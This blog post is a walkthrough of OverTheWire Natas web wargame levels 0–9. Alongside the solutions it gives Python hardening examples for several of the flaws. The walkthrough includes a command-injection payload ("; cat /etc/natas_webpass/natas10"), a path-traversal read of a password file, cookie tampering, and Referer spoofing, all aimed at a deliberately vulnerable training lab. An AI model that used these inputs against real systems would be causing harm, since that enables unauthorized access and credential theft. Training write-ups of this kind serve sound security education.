
Natas Challenges (part 1)

The Natas challenges are all web server related wargames provided by OverTheWire. OverTheWire has been around for quite some time and is a very good way to get introduced to CTFs and thinking in the way needed to solve these sorts of challenges.

The concept behind these wargames is that they get progressively harder as you move through the levels, requiring more and more research into common vulnerabilities in contrived cases. The start of the challenges can be found here: challenges. This post will cover natas levels 0 through 9 and my solutions to them.

  • Part 2 can be found here which covers levels 10 through 14.
  • Part 3 can be found here which covers levels 15 through 18.
  • Part 4 can be found here which covers levels 19 through 24.

natas0

The first natas challenge can be found here: http://natas0.natas.labs.overthewire.org/

Login info is:

User: natas0
Pass: natas0

First thing to do is view the source of the page.

And just like that it’s solved: a “developer” left the password as a comment in the code:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.
    <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>

On to the next challenge.

natas1

Starting this off by going to: http://natas1.natas.labs.overthewire.org/

Login info is:

User: natas1
Pass: gtVrDuiDfck831PqWsLEZy5gyDz1clto

Same hint as last time: the password is somewhere in the page, but right-clicking is disabled.

There are a few different ways to solve this. First, most web browsers allow opening the Developer Tools regardless of what protections the page tries to put in place, so the source can still be viewed; an oncontextmenu handler only suppresses the context menu, not the browser’s own view-source.

However, since the page is fairly simple, I’ll do it a different way, using curl:

$ curl -u natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org/
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>

natas2

Starting this off by going to: http://natas2.natas.labs.overthewire.org/

Login info is:

User: natas2
Pass: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Well, the hint says there’s nothing on the page, which is a bit odd. Using curl again to pull down the source:

$ curl -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Curious: there is a pixel image on the page. Opening it gives a 1x1 pixel, which isn’t too interesting on its own. However, the “files/” directory it lives in may be open for anyone to browse if directory listing isn’t properly locked down.

Checking out: http://natas2.natas.labs.overthewire.org/files/ reveals that there’s a users.txt:

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

natas3

Starting this off by going to: http://natas3.natas.labs.overthewire.org/

Login info is:

User: natas3
Pass: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Again, there’s nothing on the page; the source shows:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14" };</script></head>
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>

Well, Google is built on crawling web pages with robots, and a site tells those robots what to skip in its robots.txt file. Wonder if there’s something in there that could hint at the answer.

Robots.txt:

User-agent: *
Disallow: /s3cr3t/

Looks like there’s another directory that can be browsed. Putting it all together:

http://natas3.natas.labs.overthewire.org/s3cr3t

And there’s a users.txt:

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

natas4

Starting this off by going to: http://natas4.natas.labs.overthewire.org/

Login info is:

User: natas4
Pass: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Seems that the challenges are starting to ramp up in difficulty. There are no open directories here and nothing obvious in the source, just a message stating it expects us to come from the natas5 URL:

Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/index.php" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

The hint pretty clearly states what needs to be done: spoof the referring address, which is just the Referer header the client sends. curl can set that header for us.

Details on curl’s --referer option from the man page:

       -e, --referer <URL>
              (HTTP) Sends the "Referrer Page" information to the HTTP server. This can also be set with the -H, --header flag of course.

              When used with -L, --location you can append ";auto" to the -e, --referer URL to make curl automatically set the previous URL when it follows a Location: header. The ";auto" string can be used alone, even if you don't set an initial -e, --referer.

              If this option is used several times, the last one will be used.

And putting it all together on the commandline:

$ curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ -e http://natas5.natas.labs.overthewire.org/  http://natas4.natas.labs.overthewire.org -v
* Rebuilt URL to: http://natas4.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas4.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas4'
> GET / HTTP/1.1
> Host: natas4.natas.labs.overthewire.org
> Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
> User-Agent: curl/7.54.0
> Accept: */*
> Referer: http://natas5.natas.labs.overthewire.org/
>
< HTTP/1.1 200 OK
< Date: Mon, 20 Jan 2020 05:38:03 GMT
< Server: Apache/2.4.10 (Debian)
< Vary: Accept-Encoding
< Content-Length: 962
< Content-Type: text/html; charset=UTF-8
<
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>

natas5

Starting this off by going to: http://natas5.natas.labs.overthewire.org/

Login info is:

User: natas5
Pass: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

“Access disallowed. You are not logged in”

Well, checking the source: nothing. Guessing from this point forward the password won’t be easily found in the source. Looking through it, though, there are no obvious hints.

Time to poke around a bit more with the Developer Tools.

This time looking at traffic. Nothing interesting.

Time to check Storage and see what cookies exist. Looks like there’s a loggedin cookie that the server uses to decide whether the user is logged in. Setting its value from 0 to 1 and then refreshing the page.

Great success:

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
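The loggedin cookie is trusted exactly as the client sends it, which is why flipping 0 to 1 works. As an added example (not part of the original post or of the Natas challenges), here is the usual fix in Python: sign the cookie value with an HMAC under a server-side key, so a client that edits the value cannot also produce a valid signature. The key, the function names and the value.signature cookie layout are my own assumptions for illustration.

```python
import hashlib
import hmac

# Constructed server-side key for the demo; a real deployment loads this from
# configuration and never sends it to the client.
SERVER_KEY = b"example-key-not-for-production"


def natas5_style_check(cookie: str) -> bool:
    """The unsigned check the level relies on: any client can set loggedin=1."""
    return cookie == "1"


def make_cookie(logged_in: bool, key: bytes = SERVER_KEY) -> str:
    """Return 'value.signature', where signature = HMAC-SHA256(key, value)."""
    value = "1" if logged_in else "0"
    sig = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{sig}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY) -> bool:
    """Accept the cookie only if its signature is valid AND it says logged in.

    A client that changes '0' to '1' invalidates the signature, and a client
    without the key cannot compute a new one.
    """
    value, sep, sig = cookie.partition(".")
    if not sep:
        return False  # no signature at all (e.g. a bare "1")
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return False
    return value == "1"


if __name__ == "__main__":
    anon = make_cookie(False)
    forged = "1." + anon.split(".")[1]  # keep the old signature, change the value
    print("unsigned check, forged value:", natas5_style_check("1"))
    print("signed check, forged value:  ", verify_cookie(forged))
    print("signed check, genuine login: ", verify_cookie(make_cookie(True)))
```

The signature only proves the value was issued by the server; it does not encrypt it, so nothing secret belongs in the value itself, and a real session layer would add an expiry and bind the cookie to a session id rather than a bare flag.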

On to the next level.

natas6

Starting this off by going to: http://natas6.natas.labs.overthewire.org/

Login info is:

User: natas6
Pass: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Greeted with a form that expects some sort of secret code, and a button that allows viewing the source. Let’s look at the source and see what’s going on.

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

The included secret.inc looks like a good place to go poking around:

view-source:http://natas6.natas.labs.overthewire.org/includes/secret.inc

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

That secret is presumably what the form needs; after submitting it:

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

natas7

Starting this off by going to: http://natas7.natas.labs.overthewire.org/

Login info is:

User: natas7
Pass: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Two links to poke around with, “Home” and “About”. Something interesting must be behind these links that will get the password to the next level. Clicking on a link changes the URL to:

http://natas7.natas.labs.overthewire.org/index.php?page=home

Looking at the source for both pages reveals a hint:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

It may be possible to give page= any location wanted, since ultimately the web server is just serving up files from directories on the server, and nothing here restricts which directory the included file comes from:

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

And then the password is printed for us:

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
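The level’s index.php includes whatever file ?page= names, so an absolute path outside the web root is accepted as-is. As an added example that is not part of the original post, the Python below contrasts that behaviour with a hardened resolver: the page name is checked against an allowlist, the extension is appended server-side, and the resolved path is confirmed to still sit under the web root. The web root, the .php suffix and the allowlist contents are my own assumptions for illustration.

```python
import os
from typing import Optional

# Assumed: the only two pages the level actually has.
ALLOWED_PAGES = {"home", "about"}


def resolve_page_unsafe(webroot: str, page: str) -> str:
    """Mirrors the level: whatever arrives in ?page= becomes the include path.

    An absolute path such as /etc/natas_webpass/natas8 is used unchanged, and a
    relative one may still climb out of the web root with '..' segments.
    """
    return page if os.path.isabs(page) else os.path.join(webroot, page)


def is_within_root(webroot: str, path: str) -> bool:
    """Containment check: after normalising symlinks and '..', is path under webroot?"""
    root = os.path.realpath(webroot)
    target = os.path.realpath(path)
    return os.path.commonpath([root, target]) == root


def resolve_page_safe(webroot: str, page: str) -> Optional[str]:
    """Allowlist first, then defence in depth with a containment check.

    Returns the file to include, or None when the request must be refused.
    """
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.join(webroot, page + ".php")  # server picks the extension
    if not is_within_root(webroot, candidate):
        return None
    return os.path.realpath(candidate)


if __name__ == "__main__":
    for requested in ("home", "/etc/natas_webpass/natas8", "../../etc/passwd"):
        print(f"{requested!r}: unsafe -> {resolve_page_unsafe('/var/www', requested)}")
        print(f"{requested!r}: safe   -> {resolve_page_safe('/var/www', requested)}")
```

The allowlist alone already closes this level’s hole; the containment check is there so that a later change to the allowlist (say, loading page names from a database) does not silently reopen it.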

natas8

Starting this off by going to: http://natas8.natas.labs.overthewire.org/

Login info is:

User: natas8
Pass: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Another form. This time looking at the source:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Looks like the interesting thing here is the encodeSecret function.

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

Just need to reverse the order of operations here and then the secret should be revealed.

There are two ways to approach this: write some PHP and run it, or use online tools to execute the PHP functions.

Applying the inverse steps in reverse order: hex2bin, then strrev, then base64_decode. That gives the secret, oubWYf2kBq.

And now for the password for the next challenge:

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

natas9

Starting this off by going to: http://natas9.natas.labs.overthewire.org/

Login info is:

User: natas9
Pass: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Looking at the source:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Looks like the interesting bit of code is here:

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}

There doesn’t seem to be any sanitizing of the input string before it is interpolated into the shell command, so it may be possible to have it execute arbitrary commands.

Trying with ;ls -al:

Output:
-rw-r----- 1 natas9 natas9 460878 Dec 15  2016 dictionary.txt

Looks like this can be exploited to execute any sort of command we’d like on the webserver. Time to find the password.

Using what we knew about the paths for the password from the previous challenge, it should be possible to explore the contents of /etc with: ; ls -al /etc/. Sure enough there’s a natas_webpass/. To get the password, just use ; cat /etc/natas_webpass/natas10 and move on to the next challenge:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
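The passthru() call in this level pastes the needle straight into a shell command line; that is the whole problem. As an added example that is not part of the original post, the Python below shows the same construction next to two hardened forms: quoting the argument (shlex.quote, the counterpart of PHP’s escapeshellarg()) and, better still, running grep with an argv list and no shell at all, behind an allowlist check on the needle. The dictionary.txt file name is from the level; the function names, the allowlist pattern and the sample words are my own assumptions.

```python
import re
import shlex
import shutil
import subprocess
import tempfile
from typing import List, Optional

DICTIONARY = "dictionary.txt"


def build_grep_unsafe(needle: str) -> str:
    """Mirrors the level: the needle is interpolated into a shell command line,
    so ';', '|', '$(...)' and the rest are interpreted by the shell."""
    return f"grep -i {needle} {DICTIONARY}"


def build_grep_quoted(needle: str) -> str:
    """Shell-quote the needle (PHP's escapeshellarg() does the same job), so the
    shell sees it as a single literal argument."""
    return f"grep -i {shlex.quote(needle)} {DICTIONARY}"


def build_grep_argv(needle: str) -> List[str]:
    """Better: no shell at all. '--' stops grep from reading a needle that
    starts with '-' as an option."""
    return ["grep", "-i", "--", needle, DICTIONARY]


# Assumed allowlist: a dictionary word search only needs letters.
NEEDLE_RE = re.compile(r"[A-Za-z]{1,32}")


def needle_is_allowed(needle: str) -> bool:
    return NEEDLE_RE.fullmatch(needle) is not None


def search_words(needle: str, dictionary: str = DICTIONARY) -> Optional[List[str]]:
    """Validate, then run grep without a shell.

    Returns the matching lines, or None when the needle is rejected or grep
    is not installed. Rejection happens before anything is executed.
    """
    if not needle_is_allowed(needle) or shutil.which("grep") is None:
        return None
    argv = build_grep_argv(needle)
    argv[-1] = dictionary
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout.splitlines()


if __name__ == "__main__":
    # Constructed dictionary for the demo.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("apple\nApricot\nbanana\n")
    print("unsafe :", build_grep_unsafe(";ls -al"))
    print("quoted :", build_grep_quoted(";ls -al"))
    print("argv   :", build_grep_argv(";ls -al"))
    print("search :", search_words("ap", fh.name))
    print("blocked:", search_words(";ls -al", fh.name))  # None: rejected before anything runs
```

Quoting fixes the shell-metacharacter problem but still hands grep a user-chosen argument, which is why the argv form adds the `--` separator; the allowlist on top of that keeps the input within what the feature actually needs. From the detection side, a needle containing `;`, `|`, or `$(` in this level’s access log is a straightforward signal of the attempt shown above.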